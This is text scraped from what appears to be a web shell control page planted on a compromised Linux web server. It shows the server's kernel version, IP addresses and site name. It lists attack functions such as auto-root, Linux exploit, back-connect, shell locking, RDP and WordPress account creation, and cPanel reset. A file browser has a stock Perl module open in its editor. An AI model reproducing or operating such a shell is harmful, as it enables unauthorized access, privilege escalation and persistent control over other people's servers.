Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.227.105.110
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
vendor_perl /
version /
[ HOME SHELL ]
Name
Size
Permission
Action
Internals.pod
24.44
KB
-rw-r--r--
regex.pm
4
KB
-rw-r--r--
vpp.pm
21.83
KB
-rw-r--r--
vxs.pm
502
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vxs.pm
#!perl -w package version::vxs; use v5.10; use strict; use vars qw(@ISA $VERSION $CLASS ); $VERSION = 0.9907; $CLASS = 'version::vxs'; eval { require XSLoader; local $^W; # shut up the 'redefined' warning for UNIVERSAL::VERSION XSLoader::load('version::vxs', $VERSION); 1; } or do { require DynaLoader; push @ISA, 'DynaLoader'; local $^W; # shut up the 'redefined' warning for UNIVERSAL::VERSION bootstrap version::vxs $VERSION; }; # Preloaded methods go here. 1;
Close